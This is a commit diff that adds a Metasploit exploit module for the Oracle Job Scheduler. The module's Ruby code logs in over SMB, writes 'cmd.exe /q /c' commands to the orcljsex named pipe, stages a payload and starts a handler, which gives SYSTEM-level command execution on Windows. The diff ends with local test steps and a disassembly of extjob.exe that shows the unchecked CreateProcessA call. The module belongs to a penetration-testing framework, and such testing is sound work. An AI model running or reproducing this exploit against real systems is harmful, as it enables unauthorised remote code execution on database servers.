Add Oracle Job Scheduler Command Execution (CreateProcessA) - Feature #6079
parent
35e868f705
commit
41697440c7
|
@ -0,0 +1,196 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Exploit::CmdStagerVBS
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle Job Scheduler Named Pipe Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job
|
||||
Scheduler is implemented via the component extjob.exe which listens on a named pipe
|
||||
called "orcljsex<SID>" and execute arbitrary commands received throw this channel via
|
||||
CreateProcess(). In order to connect to the Named Pipe remotely SMB access is required.
|
||||
This module has been tested on Oracle 10g Release 1 where the Oracle Job Scheduler
|
||||
runs as SYSTEM on Windows but it's disabled by default.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'David Litchfield', # Vulnerability discovery and exploit
|
||||
'juan vazquez', # Metasploit module
|
||||
'sinn3r' # Metasploit fu
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.amazon.com/Oracle-Hackers-Handbook-Hacking-Defending/dp/0470080221' ],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2048,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' => [['Automatic',{}]],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jan 01 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SID', [ true, 'The database sid', 'ORCL'])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Exploiting through \\\\#{datastore['RHOST']}\\orcljsex#{datastore['SID']} named pipe...")
|
||||
execute_cmdstager({:linemax => 1500})
|
||||
handler
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
connect()
|
||||
smb_login()
|
||||
pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")
|
||||
pipe.write("cmd.exe /q /c #{cmd}")
|
||||
pipe.close
|
||||
disconnect
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
begin
|
||||
connect()
|
||||
smb_login()
|
||||
pipe = simple.create_pipe("\\orcljsex#{datastore['SID']}")
|
||||
pipe.write("cmd.exe /q /c dir")
|
||||
result = pipe.read() # Exit Code
|
||||
pipe.close
|
||||
disconnect
|
||||
rescue
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
if result == "1" # Exit Code should be 1
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
How To Test locally:
|
||||
1. Go to Administrative Tools -> Services -> Set 'OracleJobSchedulerORCL' to automatic, and
|
||||
then Start the service.
|
||||
2. Make sure you know your SMBUser and SMBPass
|
||||
3. Run:
|
||||
C:\Documents and Settings\juan\PipeList>echo cmd.exe /c calc.exe > \\.\pipe\orcljsexorcl
|
||||
|
||||
Code Analysis of extjob.exe (Oracle 10g Release 1)
|
||||
=================================================
|
||||
|
||||
From _ServiceStart():
|
||||
|
||||
* Create Named Pipe and store handle on "esi":
|
||||
|
||||
.text:004017EC push offset _pipename
|
||||
.text:004017F1 lea ecx, [ebp+Name]
|
||||
.text:004017F7 push offset $SG59611 ; "\\\\.\\pipe\\orcljsex%s"
|
||||
.text:004017FC push ecx
|
||||
.text:004017FD jmp short loc_401810
|
||||
.text:004017FF ; ---------------------------------------------------------------------------
|
||||
.text:004017FF
|
||||
.text:004017FF loc_4017FF: ; CODE XREF: _ServiceStart+FAj
|
||||
.text:004017FF push offset $SG59613
|
||||
.text:00401804 lea edx, [ebp+Name]
|
||||
.text:0040180A push offset $SG59614 ; "\\\\.\\pipe\\orcljsex%s"
|
||||
.text:0040180F push edx ; Dest
|
||||
.text:00401810
|
||||
.text:00401810 loc_401810: ; CODE XREF: _ServiceStart+10Dj
|
||||
.text:00401810 call ds:__imp__sprintf
|
||||
.text:00401816 add esp, 0Ch
|
||||
.text:00401819 push edi
|
||||
.text:0040181A push edi
|
||||
.text:0040181B push 4
|
||||
.text:0040181D call _ReportStatusToSCMgr
|
||||
.text:00401822 add esp, 0Ch
|
||||
.text:00401825 test eax, eax
|
||||
.text:00401827 jz loc_4018EC
|
||||
.text:0040182D mov edi, ds:__imp__CreateNamedPipeA@32 ; CreateNamedPipeA(x,x,x,x,x,x,x,x)
|
||||
.text:0040185C mov esi, eax
|
||||
|
||||
* Connect Named Pipe
|
||||
|
||||
.text:0040188F push eax ; lpOverlapped
|
||||
.text:00401890 push esi ; hNamedPipe
|
||||
.text:00401891 call ds:__imp__ConnectNamedPipe@8 ; ConnectNamedPipe(x,x)
|
||||
|
||||
* Create Thread with ExecMain() as lpStartAddress and esi (The Pipe handle) as parameter
|
||||
|
||||
.text:004018B9 lea edx, [ebp+ThreadId]
|
||||
.text:004018BC push edx ; lpThreadId
|
||||
.text:004018BD push 0 ; dwCreationFlags
|
||||
.text:004018BF push esi ; lpParameter
|
||||
.text:004018C0 push offset _ExecMain ; lpStartAddress
|
||||
.text:004018C5 push 0 ; dwStackSize
|
||||
.text:004018C7 push 0 ; lpThreadAttributes
|
||||
.text:004018C9 call ds:__imp__CreateThread@24 ; CreateThread(x,x,x,x,x,x)
|
||||
|
||||
From ExecMain():
|
||||
|
||||
* Stores Named Pipe Handle in ebx
|
||||
|
||||
.text:0040197C mov ebx, [ebp+hObject]
|
||||
|
||||
* Read From Named Pipe
|
||||
|
||||
.text:004019C4 lea eax, [ebp+NumberOfBytesRead]
|
||||
.text:004019C7 push edx ; lpOverlapped
|
||||
.text:004019C8 push eax ; lpNumberOfBytesRead
|
||||
.text:004019C9 lea ecx, [ebp+Buffer]
|
||||
.text:004019CF push 10000h ; nNumberOfBytesToRead
|
||||
.text:004019D4 push ecx ; lpBuffer
|
||||
.text:004019D5 push ebx ; hFile
|
||||
.text:004019D6 call ds:__imp__ReadFile@20 ; ReadFile(x,x,x,x,x)
|
||||
|
||||
* CreateProcess with lpCommandLine full controlled by the user input
|
||||
|
||||
.text:00401A06 mov ecx, 11h
|
||||
.text:00401A0B xor eax, eax
|
||||
.text:00401A0D lea edi, [ebp+StartupInfo]
|
||||
.text:00401A10 push esi
|
||||
.text:00401A11 rep stosd
|
||||
.text:00401A13 lea eax, [ebp+ProcessInformation]
|
||||
.text:00401A16 lea ecx, [ebp+StartupInfo]
|
||||
.text:00401A19 push eax ; lpProcessInformation
|
||||
.text:00401A1A push ecx ; lpStartupInfo
|
||||
.text:00401A1B push 0 ; lpCurrentDirectory
|
||||
.text:00401A1D push 0 ; lpEnvironment
|
||||
.text:00401A1F push 0 ; dwCreationFlags
|
||||
.text:00401A21 push 0 ; bInheritHandles
|
||||
.text:00401A23 push 0 ; lpThreadAttributes
|
||||
.text:00401A25 lea edx, [ebp+Buffer]
|
||||
.text:00401A2B push 0 ; lpProcessAttributes
|
||||
.text:00401A2D push edx ; lpCommandLine
|
||||
.text:00401A2E push 0 ; lpApplicationName
|
||||
.text:00401A30 mov [ebp+StartupInfo.cb], 44h
|
||||
.text:00401A37 mov [ebp+StartupInfo.wShowWindow], 5
|
||||
.text:00401A3D mov [ebp+StartupInfo.dwFlags], 100h
|
||||
.text:00401A44 mov [ebp+StartupInfo.lpDesktop], offset $SG59671
|
||||
.text:00401A4B call ds:__imp__CreateProcessA@40 ; CreateProcessA(x,x,x,x,x,x,x,x,x,x)
|
||||
|
||||
|
||||
=end
|
Loading…
Reference in New Issue